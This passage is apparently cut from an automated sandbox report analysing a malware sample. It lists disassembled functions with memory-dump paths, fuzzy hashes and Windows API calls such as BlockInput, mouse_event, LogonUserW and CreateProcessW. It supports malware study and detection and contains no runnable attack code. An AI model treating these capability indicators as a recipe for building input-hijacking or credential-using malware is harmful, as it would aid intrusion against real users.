                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                                                  • Instruction ID: 9d347e03e5b74be8134238d89a5eea68c94aab785514f3cc65498f40629212e8
                                                  • Opcode Fuzzy Hash: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                                                  • Instruction Fuzzy Hash: 10B0923106C208AFCA102B91EC19B883FA8EB45BF2F404020F60D84860CB625650AA91
                                                  Function 008AF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                                                  • Instruction ID: 65987276f42022e0a750be6b3a5490b3a71675218fe40503b27c9ce94a88d9d9
                                                  • Opcode Fuzzy Hash: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                                                  • Instruction Fuzzy Hash: 8D320321E6DF024DE7239674D832335A259EFB73D4F15D737E81AB5DA6EB2884839100
                                                  Function 008B267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                                                  • Instruction ID: ddc30f19c8aee4f91f0484c61645ba571ed60dc6cf1a6b31c22af6b96fe4dcc9
                                                  • Opcode Fuzzy Hash: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                                                  • Instruction Fuzzy Hash: BAB1EF20E3AF514DD32396398831336BA5CAFBB2D5F51D71BFC2674E62EB2189839141
                                                  Function 008E8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __time64.LIBCMT ref: 008E8B25
                                                    • Part of subcall function 008A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008E91F8,00000000,?,?,?,?,008E93A9,00000000,?), ref: 008A5443
                                                    • Part of subcall function 008A543A: __aulldiv.LIBCMT ref: 008A5463
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                  • String ID:
                                                  • API String ID: 2893107130-0
                                                  • Opcode ID: cd14655df31497f32a579f48a564704ad1e63a0bac76da6276a9dbf2ed838870
                                                  • Instruction ID: 208fc7cad908d448cc8ece66c0e46d7de1d0b5fc40cb080be009d51134e080d3
                                                  • Opcode Fuzzy Hash: cd14655df31497f32a579f48a564704ad1e63a0bac76da6276a9dbf2ed838870
                                                  • Instruction Fuzzy Hash: A221EB72539510CFC729CF25D441A52F3E1EBA5321B288E6CD0E9CF1D0CA74B945DB54
                                                  Function 0090DA9A Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0090DB46
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: 2f423947b962188b1add18aab2204694bf097b7aefe6b72fbcbe0a74a55c848a
                                                  • Instruction ID: 6c74fda7beda1ace6c40c0bedde7e8703081855176df302c4ae9ec55eadffee4
                                                  • Opcode Fuzzy Hash: 2f423947b962188b1add18aab2204694bf097b7aefe6b72fbcbe0a74a55c848a
                                                  • Instruction Fuzzy Hash: DE114071305225BFFB289EACDC05F7A3B5CEB86B20F204314F9519B5D2CBA49D1093A5
                                                  Function 0090D6C6 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,008BBBA2,?,?,?,?,00000000,?), ref: 0090D740
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: d4b663fcbdfccd31b07a5d1750130d937b7ea4a655ad4a13b7569bf357e90d51
                                                  • Instruction ID: 106e5a1a39bd9c1fd761b3f8f84c35c51640cc4d0fb4f128c2408bed8068eff7
                                                  • Opcode Fuzzy Hash: d4b663fcbdfccd31b07a5d1750130d937b7ea4a655ad4a13b7569bf357e90d51
                                                  • Instruction Fuzzy Hash: 20017079601114AFDF149F6DC885FFA3B99EF82324F040125F9151B1D2C331AC21D7A0
                                                  Function 0090C220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                    • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                                    • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,008BBC4F,?,?,?,?,?,00000001,?), ref: 0090C272
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                  • String ID:
                                                  • API String ID: 2356834413-0
                                                  • Opcode ID: 19d57c95de83c3db75ca556cb4f47b310c4551de2901f7b6e9938409635b86dd
                                                  • Instruction ID: d2a5e4ef8aa5d9f04d4362a364b1789397149b94e2a6f8dc1172c7c3dbf9944a
                                                  • Opcode Fuzzy Hash: 19d57c95de83c3db75ca556cb4f47b310c4551de2901f7b6e9938409635b86dd
                                                  • Instruction Fuzzy Hash: 86F0E270204228AFCF14EF48CC15EBA3B91FB14B10F000015F9569B2A1CB75A820EBE1
                                                  Function 0088189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00881B04,?,?,?,?,?), ref: 008818E2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: ee3288775f01a3c8608b20ea9b38380b772c498ebcacb4474303cc27617797a8
                                                  • Instruction ID: 778ef649dc42df9ceeac5bd71dc397723f242d8a44de99fa2d54ff093fd77a08
                                                  • Opcode Fuzzy Hash: ee3288775f01a3c8608b20ea9b38380b772c498ebcacb4474303cc27617797a8
                                                  • Instruction Fuzzy Hash: BCF0BE742102299FCF18EF08C855D7637E6FB42310F004529F8528B2A0DB31E950EB51
                                                  Function 008F41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • BlockInput.USER32(00000001), ref: 008F4218
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: c69cf5fd57a01f1a7427b38165f4a953e37f0926a0a7f702bd72038517aad0c1
                                                  • Instruction ID: 848c49be8b5b061208c4d27530ff1574a74bfda4f49a54b6c27f9b9fd4ee3148
                                                  • Opcode Fuzzy Hash: c69cf5fd57a01f1a7427b38165f4a953e37f0926a0a7f702bd72038517aad0c1
                                                  • Instruction Fuzzy Hash: F8E01A312502189FC710AF69D844AAAB7E8FF94760F048026F94AC7752DA71A8408BA1
                                                  Function 0090CBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0090CBEE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogNtdllProc_
                                                  • String ID:
                                                  • API String ID: 3239928679-0
                                                  • Opcode ID: 5ce427d8b8cc16466f58ff913f534cc7930522ccb85712a3e17851295197d218
                                                  • Instruction ID: 19c09fce34cdb3456107a66b93643fe315ac38bef15879cd3b45c7cf68911ef4
                                                  • Opcode Fuzzy Hash: 5ce427d8b8cc16466f58ff913f534cc7930522ccb85712a3e17851295197d218
                                                  • Instruction Fuzzy Hash: 04F09231244355BFDB21EF58DC05FD63B95EB0A720F044018FA11272E1CB707920E7A1
                                                  Function 008E4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008E4EEC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  • Opcode ID: a2ad7da4c59335d2bead6ca05db0c17fa743749597c4a8a542d9c66ed87d937d
                                                  • Instruction ID: f875ca3de9013b8bc52489da072f306a1cb6411a347e677351af8000ac021b73
                                                  • Opcode Fuzzy Hash: a2ad7da4c59335d2bead6ca05db0c17fa743749597c4a8a542d9c66ed87d937d
                                                  • Instruction Fuzzy Hash: 3CD05E9816478B39EC684B279C5FF770208F3037A5FD0714AB10AC94C1D8D16C506031
                                                  Function 008D8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008D88D1), ref: 008D8CB3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  • Opcode ID: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
                                                  • Instruction ID: 5d24131771877721f1f99df45e9c99aaab165559e3e4a7ba93d32db8b102197b
                                                  • Opcode Fuzzy Hash: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
                                                  • Instruction Fuzzy Hash: 70D05E3226450EAFEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D935AB60
                                                  Function 0090CBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,008BBC0C,?,?,?,?,?,?), ref: 0090CC24
                                                    • Part of subcall function 0090B8EF: _memset.LIBCMT ref: 0090B8FE
                                                    • Part of subcall function 0090B8EF: _memset.LIBCMT ref: 0090B90D
                                                    • Part of subcall function 0090B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00947F20,00947F64), ref: 0090B93C
                                                    • Part of subcall function 0090B8EF: CloseHandle.KERNEL32 ref: 0090B94E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                  • String ID:
                                                  • API String ID: 2364484715-0
                                                  • Opcode ID: f22ac910450bdc48d7403e07df597c3b7a640a5bae62fb5f0f8ead9ae9078ece
                                                  • Instruction ID: c62945cabae8d6d5c0a16278a26cfda562d58cc3e84d8ad371f7b708031f7793
                                                  • Opcode Fuzzy Hash: f22ac910450bdc48d7403e07df597c3b7a640a5bae62fb5f0f8ead9ae9078ece
                                                  • Instruction Fuzzy Hash: 08E04676110218DFDB01EF04DD10E9537A9FB0D300F008411FE05172B2CB31A960EF50
                                                  Function 0088167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00881AEE,?,?,?), ref: 008816AB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: dac28a95f153aae634251362aa61f275e8c9865b174fb0c48c603e7d0f410ad4
                                                  • Instruction ID: e241509ce593cce906dab78d68dc7497f1aa5877c5bbb80978c38b8f30e1dac4
                                                  • Opcode Fuzzy Hash: dac28a95f153aae634251362aa61f275e8c9865b174fb0c48c603e7d0f410ad4
                                                  • Instruction Fuzzy Hash: 26E0EC75104208BBCF15EF94DC21E643B26FB59714F108418FA455A2A1CA32A522EB51
                                                  Function 0090CB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtdllDialogWndProc_W.NTDLL ref: 0090CB75
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogNtdllProc_
                                                  • String ID:
                                                  • API String ID: 3239928679-0
                                                  • Opcode ID: e74df03af8659f7b52b55e79dd485f241b4208c38dd6d26df9e9cf513331121c
                                                  • Instruction ID: de10fee1ca166b16ee83ba3653a7c0e8b495ba861d686938837f7f6e879de638
                                                  • Opcode Fuzzy Hash: e74df03af8659f7b52b55e79dd485f241b4208c38dd6d26df9e9cf513331121c
                                                  • Instruction Fuzzy Hash: 5BE04279254249AFDB01DF88DC95E963BA5AB1E700F014054FA1557362CB71A920EB62
                                                  Function 0090CB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtdllDialogWndProc_W.NTDLL ref: 0090CBA4
                                                  Memory Dump Source
